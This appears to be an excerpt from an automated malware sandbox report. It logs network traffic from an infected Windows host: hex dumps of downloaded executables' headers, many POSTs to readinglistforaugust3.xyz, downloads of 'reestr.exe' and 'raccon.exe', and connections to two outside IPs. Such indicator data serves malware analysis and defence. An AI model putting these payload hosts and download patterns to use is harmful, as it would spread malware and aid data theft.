00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:49:28 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:49:28 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:49:28 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Wed, 25 Aug 2021 06:49:28 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Aug 2021 06:50:15 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Sat, 10 Jul 2021 15:08:06 GMTETag: "60e9b7d6-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /reestr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /raccon.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /5.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.49.70.90:2080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: readinglistforaugust3.xyz

Source: unknown

Network traffic detected: DNS query count 79

Source: global traffic	TCP traffic: 192.168.2.5:49719 -> 185.230.143.48:14462
Source: global traffic	TCP traffic: 192.168.2.5:49720 -> 185.49.70.90:2080

Source: global traffic

